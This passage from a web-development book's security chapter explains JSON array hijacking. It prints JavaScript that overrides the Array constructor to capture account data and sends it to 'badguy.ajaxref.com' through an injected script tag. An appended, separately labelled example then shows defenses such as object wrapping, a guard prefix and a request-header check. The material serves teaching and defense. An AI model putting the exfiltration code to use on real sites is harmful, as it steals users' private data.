AJAX - The Complete Reference


PART II


Chapter 7: Security Concerns 325


This might not seem so bad, since the JSON array is just a literal and the intruder would
have no easy way to reference the sensitive data. But not so fast: via JavaScript they could,
in fact, reach the data by overriding the core features of an Array object that get and set
values. The literal is still legal JavaScript, so an Array still has to be instantiated to hold it.
What you see in the following code is the values being copied and then sent to
saveAccounts().

function Array()
{
    var obj = this;
    var ind = 0;
    // Invoked each time the literal stores an element; object elements are copied out
    var getNext = function(arrayItem)
    {
        // Non-standard, Mozilla-only "setter =" syntax: re-arm the hook for the next index
        obj[ind++] setter = getNext;
        if (arrayItem)
        {
            if (typeof(arrayItem) == "object")
            {
                var data = "";
                for (var i in arrayItem)
                    data += i + ": " + arrayItem[i] + " ";
                saveAccounts(data);
            }
        }
    };
    // Hook element 0 so the first value assigned by the literal triggers getNext
    this[ind++] setter = getNext;
}

The function saveAccounts() then uses traditional JavaScript mechanisms to transmit
the stolen data to some third site as shown in the following code:

function saveAccounts(payload)
{
    // The data rides out in the query string of a dynamically added script tag
    var url = "http://badguy.ajaxref.com/ch7/saveaccounts.php?accounts=" + payload;
    var scr = document.createElement("script");
    scr.src = url;
    document.body.appendChild(scr);
}

To see this kind of attack in action, visit the online example at
http://ajaxref.com/ch7/jsonarray.php, which is also shown in Figure 7-14.
This particular method will even work if the bank site has been using SSL. Remember, it
is the user's browser, with its trust relationship to the bank, that is making the request for
the hacker.
Before you go dumping JSON as a data format, however, read on to get the full picture
and then we’ll see how we might address these concerns quite easily. Before that, we start
with some good news: as of this book’s writing, it appears it is not possible to steal an object
response. So if the payload had been sent back like so:

{"accountNumber":"1174674826","ssn":"111-22-3333","name":"Malcolm Reynolds"}
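The response-side and request-side defenses the text alludes to, written as an added example in modern JavaScript rather than the book's own code; the account record, the `)]}',` guard string and the helper names are assumptions made for this demonstration:

```javascript
// Added example (not from the book): two response-side defenses against the
// JSON array hijack above, plus the request check and client parse that go
// with them. The sample record and helper names are constructed.

// Constructed sample payload, same shape as the book's bank response.
const accounts = [
  { accountNumber: "1174674826", name: "Malcolm Reynolds" },
];

// Defense 1: wrap the array in an object. Loaded via <script src>, a top-level
// "{...}" is read as a block statement, the quoted key is a syntax error, and
// no Array is ever built from the data.
function wrapAsObject(arr) {
  return JSON.stringify({ data: arr });
}

// Defense 2: prefix the body with text that is a syntax error as a script.
// The site's own XMLHttpRequest code strips the prefix before JSON.parse.
const GUARD = ")]}',\n";
function guardedJson(value) {
  return GUARD + JSON.stringify(value);
}
function parseGuardedJson(text) {
  if (!text.startsWith(GUARD)) {
    throw new Error("response is missing the anti-hijack prefix");
  }
  return JSON.parse(text.slice(GUARD.length));
}

// Request check: a cross-site <script> tag cannot add request headers, so
// requiring one that only the site's XMLHttpRequest code sets rejects the
// hijacker's include before any data leaves the server (keys lower-cased).
function isOwnAjaxRequest(headers) {
  var h = headers["x-requested-with"] || "";
  return h.toLowerCase() === "xmlhttprequest";
}

// Audit helper: would this body run if included as a script? new Function()
// parses without executing; true means the body is a live expression that an
// overridden Array constructor would see.
function evaluatesAsScript(body) {
  try {
    new Function(body);
    return true;
  } catch (e) {
    return false;
  }
}
```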